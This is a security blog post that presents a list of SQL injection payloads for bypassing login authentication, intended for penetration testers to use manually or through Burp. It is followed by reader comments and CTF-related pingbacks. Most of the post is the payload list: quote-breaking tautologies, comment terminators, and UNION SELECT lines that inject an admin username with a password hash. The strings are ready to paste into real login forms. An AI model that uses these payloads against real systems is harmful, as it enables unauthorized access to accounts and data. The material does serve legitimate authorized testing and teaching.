Research Paper
Research Paper
Methodologies
Resources
Contact
This list can be used by penetration testers when testing for SQL injection authentication bypass.A
penetration tester can use it manually or through burp in order to automate the process.The creator
of this list is Dr. Emin İslam TatlıIf (OWASP Board Member).If you have any other suggestions please
feel free to leave a comment in order to improve and expand the list.
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
Rate this:
45 Votes
Share this:
Twitter
Facebook
LinkedIn
Reddit
Tumblr
Skype
WhatsApp
Telegram
Pinterest
Pocket
Email
Related
18 Comments
Yaopointcom says:
Reply
Reply
Mr Bou3o says:
if there is a break in the website or application, somme ways could success and others
not ??!!
Thank you.
Reply
Pingback: Authentication Bypass | Official @bugcrowd BlogOfficial @bugcrowd Blog
great job
Reply
Pingback: PicoCTF 2013 – Injection | dook's Blog
ehtesham says:
how to use ??
Reply
Pingback: HackDay CTF 2016 (Albania) – N13manT
aranisec says:
Reply
Sathish says:
Super
Reply
northamlab says:
Reply
Pingback: Magento SQL Injection. How to Secure your Magento Store against SQLi
Great Post!
Reply
Pingback: Pwning OWASP’s Juice Shop Pt. 5: Login Admin | Curiosity Kills Colby
Leave a Reply
Top of Form
Bottom of Form
Post navigation
Previous Previous post: File Upload Exploitation
Search Topic
Top of Form
Bottom of Form
Enter your email address to follow this blog and receive notifications of new posts by email.
Email Address:
Bottom of Form
Recent Posts
Unconstrained Delegation
Persistence – Notepad++ Plugins
Shadow Credentials
Categories
Coding (10)
Infrastructure (2)
Man-in-the-middle (1)
Persistence (28)
Reviews (1)
Tools (7)
VoIP (4)
Wireless (2)
@ Twitter
@HuskyHacksMK I had written an article last year. I haven't use Certipy to be fair but a combination
of other tools… twitter.com/i/web/status/1… 13 hours ago
Just in case your are in Mastodon you can still find me here --> infosec.exchange/@netbiosX
1 day ago
Bypassing Kerberoast Detections with Modified KDC Options and Encryption Types
github.com/trustedsec/orp… 1 day ago
6,551,012 hits
Facebook Page
Blog at WordPress.com.